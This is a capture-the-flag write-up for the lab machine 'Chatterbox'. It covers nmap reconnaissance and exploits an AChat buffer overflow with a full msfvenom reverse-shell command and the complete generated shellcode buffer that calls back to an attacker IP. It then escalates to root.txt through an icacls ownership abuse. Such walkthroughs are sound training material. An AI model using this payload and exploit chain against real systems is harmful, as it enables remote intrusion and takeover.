Chatterbox
Reconnaissance:
NMAP
┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.74
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=12/20%OT=135%CT=1%CU=37275%PV=Y%DS=2%DC=I%G=Y%TM=65
OS:8391E5%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=108%TI=I%CI=I%II=I%TS=
OS:7)SEQ(SP=103%GCD=1%ISR=108%TI=I%CI=I%II=I%SS=S%TS=7)OPS(O1=M53CNW8ST11%O
OS:2=M53CNW8ST11%O3=M53CNW8NNT11%O4=M53CNW8ST11%O5=M53CNW8ST11%O6=M53CST11)
OS:WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W=
OS:2000%O=M53CNW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%
OS:DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%
OS:O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%
OS:W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=
OS:)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%
OS:UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)
Network Distance: 2 hops
Service Info: Host: CHATTERBOX; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 6h39m59s, deviation: 2h53m14s, median: 4h59m58s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: Chatterbox
| NetBIOS computer name: CHATTERBOX\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2023-12-21T01:16:08-05:00
| smb2-time:
| date: 2023-12-21T06:16:10
|_ start_date: 2023-12-21T06:11:26
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled but not required┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.74
137/udp open|filtered netbios-ns
138/udp open|filtered netbios-dgm
500/udp open|filtered isakmp
1900/udp open|filtered upnp
4500/udp open|filtered nat-t-ike
5355/udp open|filtered llmnrEnumeration:
Doing a quick google search on the service tells us that AChat is a software that enables you to chat on your local network. It can also be used to share and send files/images to other users.
AChat In general, TCP/9255 is Monitor on Network, and TCP/9256 is unassigned. That’s not terribly helpful. However, there are multiple references to AChat, and there’s a SEH-based stack buffer overflow for it Now that we know what it is, let’s run searchsploit on it.
┌──(kali💀kali)-[~]
└─$ searchsploit achat
-------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------- ---------------------------------
Achat 0.150 beta7 - Remote Buffer Overflow | windows/remote/36025.py
Achat 0.150 beta7 - Remote Buffer Overflow (Metasploit) | windows/remote/36056.rb
MataChat - 'input.php' Multiple Cross-Site Scripting Vulnerab | php/webapps/32958.txt
Parachat 5.5 - Directory Traversal | php/webapps/24647.txtIt’s vulnerable to a remote buffer overflow and there is both apython and metasploit exploit for it. We will of course work with the non-metasploit solution.
Copy the python script to your current directory.
┌──(kali💀kali)-[~/Desktop]
└─$ searchsploit -m 36025Looking at the exploit code we make note of the following things:
It looks like your classic stack buffer overflow that allows you to overflow the buffer and include malicious shell code that will get executed on the box.
The exploit author was nice enough to give us the msfvenom command that generates the malicious payload (‘buf’ variable) including the bad characters to avoid. This makes our life so much easier! The command simply spawns the calc.exe program on the target machine. So we’ll have to change the command to send a reverse shell back to our attack machine.
We also need to change the server_address to that of the IP address of Chatterbox.
There seems to be a length limit of 1152 bytes on the payload. Anything that exceeds that will probably not work. We’ll keep that in mind when using msfvenom to generate our reverse shell.
Foothold:
Use msfvenom to generate the reverse shell payload.
msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.10.14.3 LPORT=1234 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f pythonWe get back the following result.
buf = b""
buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += b"\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += b"\x49\x41\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51"
buf += b"\x41\x44\x41\x5a\x41\x42\x41\x52\x41\x4c\x41\x59"
buf += b"\x41\x49\x41\x51\x41\x49\x41\x51\x41\x49\x41\x68"
buf += b"\x41\x41\x41\x5a\x31\x41\x49\x41\x49\x41\x4a\x31"
buf += b"\x31\x41\x49\x41\x49\x41\x42\x41\x42\x41\x42\x51"
buf += b"\x49\x31\x41\x49\x51\x49\x41\x49\x51\x49\x31\x31"
buf += b"\x31\x41\x49\x41\x4a\x51\x59\x41\x5a\x42\x41\x42"
buf += b"\x41\x42\x41\x42\x41\x42\x6b\x4d\x41\x47\x42\x39"
buf += b"\x75\x34\x4a\x42\x79\x6c\x58\x68\x55\x32\x79\x70"
buf += b"\x49\x70\x6d\x30\x4f\x70\x62\x69\x39\x55\x4d\x61"
buf += b"\x77\x50\x43\x34\x52\x6b\x62\x30\x70\x30\x32\x6b"
buf += b"\x6f\x62\x6a\x6c\x34\x4b\x71\x42\x4d\x44\x52\x6b"
buf += b"\x64\x32\x6e\x48\x6c\x4f\x46\x57\x6d\x7a\x6f\x36"
buf += b"\x6c\x71\x69\x6f\x56\x4c\x4f\x4c\x4f\x71\x73\x4c"
buf += b"\x59\x72\x4c\x6c\x6d\x50\x49\x31\x48\x4f\x5a\x6d"
buf += b"\x59\x71\x39\x37\x69\x52\x69\x62\x62\x32\x61\x47"
buf += b"\x44\x4b\x50\x52\x6a\x70\x32\x6b\x30\x4a\x4f\x4c"
buf += b"\x52\x6b\x50\x4c\x5a\x71\x30\x78\x49\x53\x30\x48"
buf += b"\x39\x71\x58\x51\x4f\x61\x64\x4b\x4f\x69\x6f\x30"
buf += b"\x7a\x61\x46\x73\x64\x4b\x6e\x69\x6e\x38\x69\x53"
buf += b"\x6d\x6a\x6f\x59\x62\x6b\x30\x34\x42\x6b\x6a\x61"
buf += b"\x47\x66\x6d\x61\x4b\x4f\x46\x4c\x47\x51\x36\x6f"
buf += b"\x4c\x4d\x6d\x31\x65\x77\x4e\x58\x49\x50\x71\x65"
buf += b"\x69\x66\x4a\x63\x53\x4d\x6c\x38\x6d\x6b\x71\x6d"
buf += b"\x6d\x54\x53\x45\x49\x54\x42\x38\x64\x4b\x6f\x68"
buf += b"\x6c\x64\x39\x71\x6a\x33\x71\x56\x64\x4b\x5a\x6c"
buf += b"\x6e\x6b\x44\x4b\x6f\x68\x4d\x4c\x4a\x61\x4a\x33"
buf += b"\x52\x6b\x39\x74\x52\x6b\x49\x71\x48\x50\x55\x39"
buf += b"\x4f\x54\x4d\x54\x6b\x74\x71\x4b\x61\x4b\x50\x61"
buf += b"\x50\x59\x4e\x7a\x42\x31\x4b\x4f\x49\x50\x4f\x6f"
buf += b"\x61\x4f\x6e\x7a\x52\x6b\x6b\x62\x38\x6b\x42\x6d"
buf += b"\x6f\x6d\x52\x48\x70\x33\x4f\x42\x6d\x30\x59\x70"
buf += b"\x73\x38\x30\x77\x64\x33\x50\x32\x51\x4f\x71\x44"
buf += b"\x51\x58\x50\x4c\x33\x47\x4f\x36\x4c\x47\x6b\x4f"
buf += b"\x56\x75\x37\x48\x34\x50\x4a\x61\x49\x70\x4b\x50"
buf += b"\x6f\x39\x47\x54\x70\x54\x52\x30\x32\x48\x6f\x39"
buf += b"\x35\x30\x30\x6b\x4d\x30\x69\x6f\x57\x65\x52\x30"
buf += b"\x52\x30\x62\x30\x62\x30\x51\x30\x70\x50\x61\x30"
buf += b"\x6e\x70\x53\x38\x78\x6a\x4c\x4f\x59\x4f\x77\x70"
buf += b"\x49\x6f\x58\x55\x62\x77\x30\x6a\x4b\x55\x62\x48"
buf += b"\x7a\x6a\x6c\x4a\x6a\x6e\x6a\x63\x71\x58\x39\x72"
buf += b"\x6d\x30\x4d\x34\x4a\x32\x31\x79\x68\x66\x4f\x7a"
buf += b"\x6e\x30\x4f\x66\x30\x57\x32\x48\x52\x79\x56\x45"
buf += b"\x54\x34\x6f\x71\x69\x6f\x58\x55\x52\x65\x47\x50"
buf += b"\x71\x64\x6c\x4c\x6b\x4f\x6e\x6e\x6d\x38\x30\x75"
buf += b"\x38\x6c\x31\x58\x4c\x30\x78\x35\x63\x72\x42\x36"
buf += b"\x69\x6f\x36\x75\x72\x48\x6f\x73\x52\x4d\x70\x64"
buf += b"\x6d\x30\x55\x39\x5a\x43\x50\x57\x62\x37\x52\x37"
buf += b"\x30\x31\x4c\x36\x52\x4a\x4a\x72\x32\x39\x72\x36"
buf += b"\x58\x62\x59\x6d\x52\x46\x57\x57\x6e\x64\x4b\x74"
buf += b"\x4f\x4c\x39\x71\x4a\x61\x52\x6d\x31\x34\x6f\x34"
buf += b"\x6a\x70\x77\x56\x39\x70\x6e\x64\x52\x34\x42\x30"
buf += b"\x70\x56\x51\x46\x4e\x76\x6f\x56\x52\x36\x6e\x6e"
buf += b"\x52\x36\x61\x46\x70\x53\x50\x56\x51\x58\x44\x39"
buf += b"\x66\x6c\x4f\x4f\x62\x66\x79\x6f\x6a\x35\x63\x59"
buf += b"\x57\x70\x4e\x6e\x30\x56\x70\x46\x59\x6f\x6e\x50"
buf += b"\x71\x58\x6a\x68\x63\x57\x6d\x4d\x73\x30\x6b\x4f"
buf += b"\x77\x65\x67\x4b\x4c\x30\x38\x35\x36\x42\x4f\x66"
buf += b"\x43\x38\x67\x36\x46\x35\x55\x6d\x33\x6d\x79\x6f"
buf += b"\x78\x55\x4f\x4c\x39\x76\x63\x4c\x6b\x5a\x71\x70"
buf += b"\x79\x6b\x37\x70\x54\x35\x4d\x35\x35\x6b\x50\x47"
buf += b"\x6a\x73\x62\x52\x52\x4f\x4f\x7a\x4d\x30\x6f\x63"
buf += b"\x59\x6f\x66\x75\x41\x41"The payload size is 774 bytes, so within the limit. Copy the payload and add it in place of the payload included in the exploit. Also change the IP address to Chatterbox’s IP address.
# Create a UDP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_address = ('10.10.10.74', 9256)Then setup a listener on the attack machine to receive the reverse shell.
┌──(kali💀kali)-[~]
└─$ nc -nlvp 1234Run the exploit.
┌──(kali💀kali)-[~/Desktop]
└─$ python 36025.py
---->{P00F}!┌──(kali💀kali)-[~]
└─$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.74] 49158
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
chatterbox\alfred
C:\Users\Alfred\Desktop>type user.txt
type user.txt
f77d321-----------------------------Privilege Escalation:
Display the user account information.
C:\Users\Alfred\Desktop>net user Alfred
net user Alfred
User name Alfred
Full Name
Comment
User's comment
Country code 001 (United States)
Account active Yes
Account expires Never
Password last set 12/10/2017 9:18:08 AM
Password expires Never
Password changeable 12/10/2017 9:18:08 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 12/21/2023 1:11:25 AM
Logon hours allowed All
Local Group Memberships *Users
Global Group memberships *None
The command completed successfully.Next, view all the users on the system.
C:\Users\Alfred\Desktop>net user
net user
User accounts for \\CHATTERBOX
Administrator Alfred Guest We have three users. The user we want to compromise is the Administrator account. Next, let’s check the system privileges that are enabled for the Alfred user.
C:\Users\Alfred\Desktop>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone DisabledSetImpersonatePrivilege is not enabled so we can’t use the Juicy Potato exploit to escalate privileges. Run the systeminfo command.
C:\Users\Alfred\Desktop>systeminfo
systeminfo
Host Name: CHATTERBOX
OS Name: Microsoft Windows 7 Professional
OS Version: 6.1.7601 Service Pack 1 Build 7601
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00371-222-9819843-86663
Original Install Date: 12/10/2017, 9:18:19 AM
System Boot Time: 12/21/2023, 1:11:17 AM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x64 Family 6 Model 85 Stepping 7 GenuineIntel ~2294 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory: 2,047 MB
Available Physical Memory: 1,568 MB
Virtual Memory: Max Size: 4,095 MB
Virtual Memory: Available: 3,639 MB
Virtual Memory: In Use: 456 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: \\CHATTERBOX
Hotfix(s): 183 Hotfix(s) Installed.
[01]: KB2849697
[02]: KB2849696
[03]: KB2841134
[04]: KB2670838
[05]: KB2830477
[06]: KB2592687
[07]: KB2479943
[08]: KB2491683
[09]: KB2506212
[10]: KB2506928
[11]: KB2509553
[12]: KB2533552
[13]: KB2534111
[14]: KB2545698
[15]: KB2547666
[16]: KB2552343
[17]: KB2560656
[18]: KB2563227
[19]: KB2564958
[20]: KB2574819
[21]: KB2579686
[22]: KB2604115
[23]: KB2620704
[24]: KB2621440
[25]: KB2631813
[26]: KB2639308
[27]: KB2640148
[28]: KB2647753
[29]: KB2654428
[30]: KB2660075
[31]: KB2667402
[32]: KB2676562
[33]: KB2685811
[34]: KB2685813
[35]: KB2690533
[36]: KB2698365
[37]: KB2705219
[38]: KB2719857
[39]: KB2726535
[40]: KB2727528
[41]: KB2729094
[42]: KB2732059
[43]: KB2732487
[44]: KB2736422
[45]: KB2742599
[46]: KB2750841
[47]: KB2761217
[48]: KB2763523
[49]: KB2770660
[50]: KB2773072
[51]: KB2786081
[52]: KB2799926
[53]: KB2800095
[54]: KB2807986
[55]: KB2808679
[56]: KB2813430
[57]: KB2820331
[58]: KB2834140
[59]: KB2840631
[60]: KB2843630
[61]: KB2847927
[62]: KB2852386
[63]: KB2853952
[64]: KB2857650
[65]: KB2861698
[66]: KB2862152
[67]: KB2862330
[68]: KB2862335
[69]: KB2864202
[70]: KB2868038
[71]: KB2871997
[72]: KB2884256
[73]: KB2891804
[74]: KB2892074
[75]: KB2893294
[76]: KB2893519
[77]: KB2894844
[78]: KB2900986
[79]: KB2908783
[80]: KB2911501
[81]: KB2912390
[82]: KB2918077
[83]: KB2919469
[84]: KB2923545
[85]: KB2931356
[86]: KB2937610
[87]: KB2943357
[88]: KB2952664
[89]: KB2966583
[90]: KB2968294
[91]: KB2970228
[92]: KB2972100
[93]: KB2973112
[94]: KB2973201
[95]: KB2973351
[96]: KB2977292
[97]: KB2978742
[98]: KB2984972
[99]: KB2985461
[100]: KB2991963
[101]: KB2992611
[102]: KB3003743
[103]: KB3004361
[104]: KB3004375
[105]: KB3006121
[106]: KB3006137
[107]: KB3010788
[108]: KB3011780
[109]: KB3013531
[110]: KB3020370
[111]: KB3020388
[112]: KB3021674
[113]: KB3021917
[114]: KB3022777
[115]: KB3023215
[116]: KB3030377
[117]: KB3035126
[118]: KB3037574
[119]: KB3042058
[120]: KB3045685
[121]: KB3046017
[122]: KB3046269
[123]: KB3054476
[124]: KB3055642
[125]: KB3059317
[126]: KB3060716
[127]: KB3061518
[128]: KB3067903
[129]: KB3068708
[130]: KB3071756
[131]: KB3072305
[132]: KB3074543
[133]: KB3075226
[134]: KB3078601
[135]: KB3078667
[136]: KB3080149
[137]: KB3084135
[138]: KB3086255
[139]: KB3092627
[140]: KB3093513
[141]: KB3097989
[142]: KB3101722
[143]: KB3102429
[144]: KB3107998
[145]: KB3108371
[146]: KB3108381
[147]: KB3108664
[148]: KB3109103
[149]: KB3109560
[150]: KB3110329
[151]: KB3118401
[152]: KB3122648
[153]: KB3123479
[154]: KB3126587
[155]: KB3127220
[156]: KB3133977
[157]: KB3137061
[158]: KB3138378
[159]: KB3138612
[160]: KB3138910
[161]: KB3139398
[162]: KB3139914
[163]: KB3140245
[164]: KB3147071
[165]: KB3150220
[166]: KB3150513
[167]: KB3156016
[168]: KB3156019
[169]: KB3159398
[170]: KB3161102
[171]: KB3161949
[172]: KB3161958
[173]: KB3172605
[174]: KB3177467
[175]: KB3179573
[176]: KB3184143
[177]: KB3185319
[178]: KB4014596
[179]: KB4019990
[180]: KB4040980
[181]: KB976902
[182]: KB982018
[183]: KB4054518
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection 4
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.74The box has 208 hotfixes installed so it’s unlikely that we can escalate privileges using a kernel exploit (although it might be possible, I haven’t checked).
Let’s see if we have access to the Administrator directory.
C:\Users\Administrator\Desktop>type root.txt
type root.txt
Access is denied.We don’t have permission. View the permissions on the root.txt file.
C:\Users\Administrator\Desktop>icacls root.txt
icacls root.txt
root.txt CHATTERBOX\Administrator:(F)
Successfully processed 1 files; Failed processing 0 filesOnly Administrator has full access (F) on this file. Let’s view the permissions on the Desktop directory. We must have some kind of permission on it because we’re able to enter it.
C:\Users\Administrator>icacls Desktop
icacls Desktop
Desktop NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
CHATTERBOX\Administrator:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(F)
CHATTERBOX\Alfred:(I)(OI)(CI)(F)We have full access (F) on the Desktop directory. The Alfred user is also configured to own the root.txt file.
C:\Users\Administrator\Desktop>dir /q root.txt
dir /q root.txt
Volume in drive C has no label.
Volume Serial Number is 502F-F304
Directory of C:\Users\Administrator\Desktop
12/21/2023 01:11 AM 34 CHATTERBOX\Alfred root.txt
1 File(s) 34 bytes
0 Dir(s) 3,348,066,304 bytes freeSo we can simply grant ourselves access to it using the following command.
C:\Users\Administrator\Desktop>icacls root.txt /grant alfred:F
icacls root.txt /grant alfred:F
processed file: root.txt
Successfully processed 1 files; Failed processing 0 filesView the permissions again to confirm that the change was made.
C:\Users\Administrator\Desktop>icacls root.txt
icacls root.txt
root.txt CHATTERBOX\Alfred:(F)
CHATTERBOX\Administrator:(F)
C:\Users\Administrator\Desktop>type root.txt
type root.txt
9958f---------------------------------Last updated